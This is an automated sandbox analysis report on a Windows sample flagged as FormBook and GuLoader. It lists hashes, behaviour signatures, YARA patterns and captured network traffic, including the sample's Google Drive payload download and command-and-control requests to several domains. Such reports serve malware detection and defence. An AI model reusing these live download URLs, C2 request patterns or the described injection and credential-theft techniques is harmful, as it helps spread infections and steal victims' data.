Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fJuwM4Bwi7.exe

Overview

General Information

Sample name:fJuwM4Bwi7.exe
Analysis ID:1451684
MD5:0cb5485c0840cf976767bc45fb0b45d4
SHA1:3eee45faada0a0ee309065cc279b6c38e6dd809b
SHA256:82940860d0091481df6eb2a273504bd2066f83649ffd87dffe03582440a938cc
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • fJuwM4Bwi7.exe (PID: 8852 cmdline: "C:\Users\user\Desktop\fJuwM4Bwi7.exe" MD5: 0CB5485C0840CF976767BC45FB0B45D4)
    • fJuwM4Bwi7.exe (PID: 3344 cmdline: "C:\Users\user\Desktop\fJuwM4Bwi7.exe" MD5: 0CB5485C0840CF976767BC45FB0B45D4)
      • SLePhgUCFUcrYZVod.exe (PID: 2444 cmdline: "C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • secinit.exe (PID: 5436 cmdline: "C:\Windows\SysWOW64\secinit.exe" MD5: 3B4B8DB765C75B8024A208AE6915223C)
          • SLePhgUCFUcrYZVod.exe (PID: 2980 cmdline: "C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 9140 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: D1CC73370B9EF7D74E6D9FD9248CD687)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.83833661006.0000000002A10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.83833661006.0000000002A10000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a4d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13adf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000008.00000002.79178393595.00000000000A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.79178393595.00000000000A0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a4d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13adf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000A.00000002.83831074865.0000000000180000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 10 entries

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: fJuwM4Bwi7.exeAvira: detected
        Antivirus detection for URL or domain
        Source: www.innovtech.lifeSophos S4: Label: malware repository domain
        Source: http://www.innovtech.life/8cwt/?24eluX=SSpGlvD+1syJM+fS7Z8C1Cd2ZLeBmOr+68qPZxMelqgcCM6DsfmVmmLjkXM2/P+9S0q4oxoduwfupYzMqMwdcdYcBeP38sFbk5TUrAJPEOGdI/gD7BvPJp4=&Mjnd0=JZHP8Tx0t6Sophos S4: Label: malware repository domain
        Source: http://www.innovtech.life/8cwt/Sophos S4: Label: malware repository domain
        Multi AV Scanner detection for domain / URL
        Source: www.innovtech.lifeVirustotal: Detection: 9%Perma Link
        Multi AV Scanner detection for submitted file
        Source: fJuwM4Bwi7.exeReversingLabs: Detection: 52%
        Source: fJuwM4Bwi7.exeVirustotal: Detection: 55%Perma Link
        Yara detected FormBook
        Source: Yara matchFile source: 0000000A.00000002.83833661006.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.79178393595.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.83831074865.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.83833772004.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.83832835974.0000000001450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.83833394581.0000000004920000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.79195519059.0000000034A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Machine Learning detection for sample
        Source: fJuwM4Bwi7.exeJoe Sandbox ML: detected
        Source: fJuwM4Bwi7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.250.217.174:443 -> 192.168.11.30:49842 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.217.215.132:443 -> 192.168.11.30:49843 version: TLS 1.2
        Source: fJuwM4Bwi7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: fJuwM4Bwi7.exe, 00000008.00000001.78926393304.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SLePhgUCFUcrYZVod.exe, 00000009.00000000.79101394291.0000000000A2E000.00000002.00000001.01000000.0000000A.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83830927716.0000000000A2E000.00000002.00000001.01000000.0000000A.sdmp
        Source: Binary string: secinit.pdbGCTL source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002688000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79181660044.000000000267E000.00000004.00000020.00020000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 00000009.00000002.83832206009.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: fJuwM4Bwi7.exe, 00000008.00000003.79086644486.0000000032739000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79082655954.000000003258A000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83834030680.0000000002D2D000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.79182431961.0000000002A53000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83834030680.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.79178692892.00000000028A4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: fJuwM4Bwi7.exe, fJuwM4Bwi7.exe, 00000008.00000003.79086644486.0000000032739000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79082655954.000000003258A000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83834030680.0000000002D2D000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.79182431961.0000000002A53000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83834030680.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.79178692892.00000000028A4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: fJuwM4Bwi7.exe, 00000008.00000001.78926393304.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: secinit.pdb source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002688000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79181660044.000000000267E000.00000004.00000020.00020000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 00000009.00000002.83832206009.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 5_2_0040603A FindFirstFileA,FindClose,5_2_0040603A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 5_2_004055F6 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_004055F6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 5_2_00402645 FindFirstFileA,5_2_00402645
        Source: Joe Sandbox ViewIP Address: 91.195.240.123 91.195.240.123
        Source: Joe Sandbox ViewIP Address: 3.64.163.50 3.64.163.50
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 Jun 2024 12:18:53 GMTServer: ApacheX-Powered-By: PHP/8.1.28Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 2508Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 bd 59 7b 73 da b8 16 ff 3b 7c 0a d5 9d ad 61 8a 0d a4 24 a1 10 a7 3b 7d e5 ee 9d 6d bb b3 cd de d9 3b 9d 4e 47 d8 b2 51 22 4b ae 25 e3 d0 34 df fd 1e 49 b6 31 81 a4 d9 b6 73 21 10 bd 7c 74 5e 3a e7 77 c4 f1 83 97 ef 5e 9c fd f7 8f 57 68 a1 52 76 d2 39 d6 ff 50 c8 b0 94 81 23 33 cf 74 3b 7b 7b 7b d0 96 84 44 59 2e 22 a4 c7 bd b8 60 cc 41 0c f3 24 70 08 77 f4 a3 04 47 27 7a ad 7e 75 3a fa d3 39 7e e0 79 e8 5d 46 38 3a cd 71 b6 40 9e 07 0b 53 a2 30 02 4a 19 c9 d5 2a 70 44 32 2d 72 a0 15 0a ae 08 57 81 b3 50 2a 9b 0e 06 65 59 fa 73 c2 92 1c 2f c9 92 32 86 fd 50 a4 83 49 58 aa 81 83 06 3b e9 a8 55 46 5a 84 4a 32 97 54 11 b3 ba 62 cb 30 74 56 52 a5 48 8e 5e e0 3c 6a b1 c4 71 4a 02 47 d9 c9 69 08 93 2d 5a b2 48 53 9c af da b4 e0 63 1f 0c 17 38 97 04 16 fd 75 f6 da 9b 38 9b f4 96 94 94 99 c8 55 9b 2f 1a a9 45 10 81 54 21 f1 4c a7 8f 28 a7 8a 62 e6 c9 10 33 12 8c fc a1 26 a3 99 7d 49 62 5c 30 85 5e bc 7f 6f 79 65 94 5f a0 9c b0 c0 95 6a c5 88 5c 10 a2 5c 44 23 e8 57 16 f2 42 29 f5 c7 45 68 91 93 38 70 2b 8d 6e 6b b3 cc bc 8a ab 41 c6 8a 84 72 39 80 61 ca 13 4f 0a c1 07 59 31 67 34 1c 00 a9 81 c2 94 95 94 47 3e cc fa 30 f0 6c 49 f2 e0 d0 1f 1d f9 63 17 69 bd 07 ae 22 97 6a 60 b6 4d 49 44 71 e0 62 c6 5c d0 17 ba 0f cb 31 b0 81 4b 22 45 4a 7e 26 eb 2d b2 46 0c 60 e9 7b 24 e8 ec 35 6f fd 65 0c 73 2a 44 c2 08 7a 0d 3b dc 30 8c b3 96 d2 b1 62 18 9f 96 20 87 e6 47 fa 89 79 14 67 54 1a 51 34 33 31 4e 29 5b 05 7f 8a b9 50 62 3a 1e 0e 1f 3d 1c 3e 99 cc 22 2a 33 86 57 81 2c 71 e6 00 1f 9d ca 85 4f 99 98 63 86 de 9b 8d ec f6 66 53 70 ce 87 70 3e 33 9c 90 ab 50 30 91 4f 1f be 36 af 6b 54 8f 23 5f 1f 60 38 ac 24 f7 14 4e bc c5 a8 7f eb d4 fe ed 53 4f 6e 9f 1a df 3e 75 70 fb d4 e1 0d 86 9b 85 6d 06 db 1c b5 59 68 ef d9 de e4 26 d5 19 d2 16 f0 ac b6 a7 ee 19 4d 41 7d 6f 49 89 fe 14 29 e6 6e 1f 99 91 be 24 39 8d 67 66 69 49 68 b2 50 d3 27 c3 a1 ed 1b 35 4f b9 c8 53 cc 5a 4a c5 b7 aa 1b 4f 17 02 5c ad 9e 27 87 fa bd 96 ce 9f 2b 7e 35 c7 e1 45 92 8b 82 c3 d9 dd 20 33 17 d1 ea d6 59 f4 80 a6 3a b4 60 ae 66 a8 b5 88 a6 40 78 0a ee 48 70 ee c1 b1 89 28 9c 92 ee 30 22 49 1f e5 c9 1c 77 87 7d f3 f6 0f 7b 5b 03 bd 3e 04 e3 ae fb 8d 13 57 64 4c e0 48 0e f6 87 fb e3 c1 70 dc 2c 06 83 e6 c2 3f cf 12 b7 37 bb b6 07 e6 57 73 94 90 e0 6c 85 64 98 13 c8 05 98 47 a8 9b e2 4b 1b fb a6 68 3c 19 66 97 3d 74 65 03 ab d1 1c a7 f4 3c 5e a2 ab 85 d5 fe 18 16 b4 a5 b5 ea bd cc 8e f8 82 a3 2b 7d 6c 3d cc 68 c2 a7 21 70 07 91 7d 6b e9 f9 05 97 72 72 07 bd da 1b b5 d6 bc 39 13 e1 85 b7 1a ca f0 e8 a0 8f 90 a1 d0 ea d9 e6 bd f6 8d c6 44 8d e3 6f c8 31 2f 94 12 1c dc 21 07 2a de e7 e1 d3 70 c9 ee 45 fd f3 45 ce e5 e8 76 ea 3
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 Jun 2024 12:18:56 GMTServer: ApacheX-Powered-By: PHP/8.1.28Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 2508Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 bd 59 7b 73 da b8 16 ff 3b 7c 0a d5 9d ad 61 8a 0d a4 24 a1 10 a7 3b 7d e5 ee 9d 6d bb b3 cd de d9 3b 9d 4e 47 d8 b2 51 22 4b ae 25 e3 d0 34 df fd 1e 49 b6 31 81 a4 d9 b6 73 21 10 bd 7c 74 5e 3a e7 77 c4 f1 83 97 ef 5e 9c fd f7 8f 57 68 a1 52 76 d2 39 d6 ff 50 c8 b0 94 81 23 33 cf 74 3b 7b 7b 7b d0 96 84 44 59 2e 22 a4 c7 bd b8 60 cc 41 0c f3 24 70 08 77 f4 a3 04 47 27 7a ad 7e 75 3a fa d3 39 7e e0 79 e8 5d 46 38 3a cd 71 b6 40 9e 07 0b 53 a2 30 02 4a 19 c9 d5 2a 70 44 32 2d 72 a0 15 0a ae 08 57 81 b3 50 2a 9b 0e 06 65 59 fa 73 c2 92 1c 2f c9 92 32 86 fd 50 a4 83 49 58 aa 81 83 06 3b e9 a8 55 46 5a 84 4a 32 97 54 11 b3 ba 62 cb 30 74 56 52 a5 48 8e 5e e0 3c 6a b1 c4 71 4a 02 47 d9 c9 69 08 93 2d 5a b2 48 53 9c af da b4 e0 63 1f 0c 17 38 97 04 16 fd 75 f6 da 9b 38 9b f4 96 94 94 99 c8 55 9b 2f 1a a9 45 10 81 54 21 f1 4c a7 8f 28 a7 8a 62 e6 c9 10 33 12 8c fc a1 26 a3 99 7d 49 62 5c 30 85 5e bc 7f 6f 79 65 94 5f a0 9c b0 c0 95 6a c5 88 5c 10 a2 5c 44 23 e8 57 16 f2 42 29 f5 c7 45 68 91 93 38 70 2b 8d 6e 6b b3 cc bc 8a ab 41 c6 8a 84 72 39 80 61 ca 13 4f 0a c1 07 59 31 67 34 1c 00 a9 81 c2 94 95 94 47 3e cc fa 30 f0 6c 49 f2 e0 d0 1f 1d f9 63 17 69 bd 07 ae 22 97 6a 60 b6 4d 49 44 71 e0 62 c6 5c d0 17 ba 0f cb 31 b0 81 4b 22 45 4a 7e 26 eb 2d b2 46 0c 60 e9 7b 24 e8 ec 35 6f fd 65 0c 73 2a 44 c2 08 7a 0d 3b dc 30 8c b3 96 d2 b1 62 18 9f 96 20 87 e6 47 fa 89 79 14 67 54 1a 51 34 33 31 4e 29 5b 05 7f 8a b9 50 62 3a 1e 0e 1f 3d 1c 3e 99 cc 22 2a 33 86 57 81 2c 71 e6 00 1f 9d ca 85 4f 99 98 63 86 de 9b 8d ec f6 66 53 70 ce 87 70 3e 33 9c 90 ab 50 30 91 4f 1f be 36 af 6b 54 8f 23 5f 1f 60 38 ac 24 f7 14 4e bc c5 a8 7f eb d4 fe ed 53 4f 6e 9f 1a df 3e 75 70 fb d4 e1 0d 86 9b 85 6d 06 db 1c b5 59 68 ef d9 de e4 26 d5 19 d2 16 f0 ac b6 a7 ee 19 4d 41 7d 6f 49 89 fe 14 29 e6 6e 1f 99 91 be 24 39 8d 67 66 69 49 68 b2 50 d3 27 c3 a1 ed 1b 35 4f b9 c8 53 cc 5a 4a c5 b7 aa 1b 4f 17 02 5c ad 9e 27 87 fa bd 96 ce 9f 2b 7e 35 c7 e1 45 92 8b 82 c3 d9 dd 20 33 17 d1 ea d6 59 f4 80 a6 3a b4 60 ae 66 a8 b5 88 a6 40 78 0a ee 48 70 ee c1 b1 89 28 9c 92 ee 30 22 49 1f e5 c9 1c 77 87 7d f3 f6 0f 7b 5b 03 bd 3e 04 e3 ae fb 8d 13 57 64 4c e0 48 0e f6 87 fb e3 c1 70 dc 2c 06 83 e6 c2 3f cf 12 b7 37 bb b6 07 e6 57 73 94 90 e0 6c 85 64 98 13 c8 05 98 47 a8 9b e2 4b 1b fb a6 68 3c 19 66 97 3d 74 65 03 ab d1 1c a7 f4 3c 5e a2 ab 85 d5 fe 18 16 b4 a5 b5 ea bd cc 8e f8 82 a3 2b 7d 6c 3d cc 68 c2 a7 21 70 07 91 7d 6b e9 f9 05 97 72 72 07 bd da 1b b5 d6 bc 39 13 e1 85 b7 1a ca f0 e8 a0 8f 90 a1 d0 ea d9 e6 bd f6 8d c6 44 8d e3 6f c8 31 2f 94 12 1c dc 21 07 2a de e7 e1 d3 70 c9 ee 45 fd f3 45 ce e5 e8 76 ea 3
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 Jun 2024 12:18:59 GMTServer: ApacheX-Powered-By: PHP/8.1.28Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 2508Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 bd 59 7b 73 da b8 16 ff 3b 7c 0a d5 9d ad 61 8a 0d a4 24 a1 10 a7 3b 7d e5 ee 9d 6d bb b3 cd de d9 3b 9d 4e 47 d8 b2 51 22 4b ae 25 e3 d0 34 df fd 1e 49 b6 31 81 a4 d9 b6 73 21 10 bd 7c 74 5e 3a e7 77 c4 f1 83 97 ef 5e 9c fd f7 8f 57 68 a1 52 76 d2 39 d6 ff 50 c8 b0 94 81 23 33 cf 74 3b 7b 7b 7b d0 96 84 44 59 2e 22 a4 c7 bd b8 60 cc 41 0c f3 24 70 08 77 f4 a3 04 47 27 7a ad 7e 75 3a fa d3 39 7e e0 79 e8 5d 46 38 3a cd 71 b6 40 9e 07 0b 53 a2 30 02 4a 19 c9 d5 2a 70 44 32 2d 72 a0 15 0a ae 08 57 81 b3 50 2a 9b 0e 06 65 59 fa 73 c2 92 1c 2f c9 92 32 86 fd 50 a4 83 49 58 aa 81 83 06 3b e9 a8 55 46 5a 84 4a 32 97 54 11 b3 ba 62 cb 30 74 56 52 a5 48 8e 5e e0 3c 6a b1 c4 71 4a 02 47 d9 c9 69 08 93 2d 5a b2 48 53 9c af da b4 e0 63 1f 0c 17 38 97 04 16 fd 75 f6 da 9b 38 9b f4 96 94 94 99 c8 55 9b 2f 1a a9 45 10 81 54 21 f1 4c a7 8f 28 a7 8a 62 e6 c9 10 33 12 8c fc a1 26 a3 99 7d 49 62 5c 30 85 5e bc 7f 6f 79 65 94 5f a0 9c b0 c0 95 6a c5 88 5c 10 a2 5c 44 23 e8 57 16 f2 42 29 f5 c7 45 68 91 93 38 70 2b 8d 6e 6b b3 cc bc 8a ab 41 c6 8a 84 72 39 80 61 ca 13 4f 0a c1 07 59 31 67 34 1c 00 a9 81 c2 94 95 94 47 3e cc fa 30 f0 6c 49 f2 e0 d0 1f 1d f9 63 17 69 bd 07 ae 22 97 6a 60 b6 4d 49 44 71 e0 62 c6 5c d0 17 ba 0f cb 31 b0 81 4b 22 45 4a 7e 26 eb 2d b2 46 0c 60 e9 7b 24 e8 ec 35 6f fd 65 0c 73 2a 44 c2 08 7a 0d 3b dc 30 8c b3 96 d2 b1 62 18 9f 96 20 87 e6 47 fa 89 79 14 67 54 1a 51 34 33 31 4e 29 5b 05 7f 8a b9 50 62 3a 1e 0e 1f 3d 1c 3e 99 cc 22 2a 33 86 57 81 2c 71 e6 00 1f 9d ca 85 4f 99 98 63 86 de 9b 8d ec f6 66 53 70 ce 87 70 3e 33 9c 90 ab 50 30 91 4f 1f be 36 af 6b 54 8f 23 5f 1f 60 38 ac 24 f7 14 4e bc c5 a8 7f eb d4 fe ed 53 4f 6e 9f 1a df 3e 75 70 fb d4 e1 0d 86 9b 85 6d 06 db 1c b5 59 68 ef d9 de e4 26 d5 19 d2 16 f0 ac b6 a7 ee 19 4d 41 7d 6f 49 89 fe 14 29 e6 6e 1f 99 91 be 24 39 8d 67 66 69 49 68 b2 50 d3 27 c3 a1 ed 1b 35 4f b9 c8 53 cc 5a 4a c5 b7 aa 1b 4f 17 02 5c ad 9e 27 87 fa bd 96 ce 9f 2b 7e 35 c7 e1 45 92 8b 82 c3 d9 dd 20 33 17 d1 ea d6 59 f4 80 a6 3a b4 60 ae 66 a8 b5 88 a6 40 78 0a ee 48 70 ee c1 b1 89 28 9c 92 ee 30 22 49 1f e5 c9 1c 77 87 7d f3 f6 0f 7b 5b 03 bd 3e 04 e3 ae fb 8d 13 57 64 4c e0 48 0e f6 87 fb e3 c1 70 dc 2c 06 83 e6 c2 3f cf 12 b7 37 bb b6 07 e6 57 73 94 90 e0 6c 85 64 98 13 c8 05 98 47 a8 9b e2 4b 1b fb a6 68 3c 19 66 97 3d 74 65 03 ab d1 1c a7 f4 3c 5e a2 ab 85 d5 fe 18 16 b4 a5 b5 ea bd cc 8e f8 82 a3 2b 7d 6c 3d cc 68 c2 a7 21 70 07 91 7d 6b e9 f9 05 97 72 72 07 bd da 1b b5 d6 bc 39 13 e1 85 b7 1a ca f0 e8 a0 8f 90 a1 d0 ea d9 e6 bd f6 8d c6 44 8d e3 6f c8 31 2f 94 12 1c dc 21 07 2a de e7 e1 d3 70 c9 ee 45 fd f3 45 ce e5 e8 76 ea 3
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1aR4Z8ZJ0aOrlWMPa0XiQ2Bvj5cArcFOq HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1aR4Z8ZJ0aOrlWMPa0XiQ2Bvj5cArcFOq&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=iQ4bGvtt1bUOdIMmx0FoKxyGgfNtaKfegGtnnpaIA0bWJs9Q4689zouPx5Y4+HL6T4TvrzgawqpIlVOGUgGREoTlcD3Zw3RnhErLbn743FaHB2O7toC+0mA=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.respirelavie.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=KAkr0JsC36DOGBdb86MaWw8oa5TA2XZrFg5SI4PSAqjqBay0+Mt9GFSkKu0kcsR0pRjPiVoCFffv9kAFnu4p94pvlKRDsoyD63jLrTdFBvrOG4BRdTojXfc=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.airportsurvery.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=SSpGlvD+1syJM+fS7Z8C1Cd2ZLeBmOr+68qPZxMelqgcCM6DsfmVmmLjkXM2/P+9S0q4oxoduwfupYzMqMwdcdYcBeP38sFbk5TUrAJPEOGdI/gD7BvPJp4=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.innovtech.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
